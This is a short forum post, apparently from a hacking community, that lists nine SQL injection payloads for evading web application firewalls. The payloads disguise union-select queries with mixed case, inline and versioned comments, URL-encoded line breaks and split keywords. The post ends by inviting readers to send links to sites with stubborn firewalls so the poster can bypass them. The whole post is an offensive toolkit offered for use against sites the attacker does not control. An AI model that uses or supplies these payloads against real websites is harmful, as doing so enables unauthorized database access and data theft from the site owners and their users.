Hi Guys I am new here. I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

Sql Injections WAF bypass methods

1) id=1+UnIoN+SeLecT 1,2,3

2) id=1+UnIOn/**/SeLect 1,2,3

3) id=1+UNIunionON+SELselectECT 1,2,3

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3

5) id=1 and (select 1)=(Select 0xAA 1000 more As)+UnIoN+SeLeCT 1,2,3

6) id=1+%23*********%0aUnIOn%23*********%0aSeLecT+1,2 ,3

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3

/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3


If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.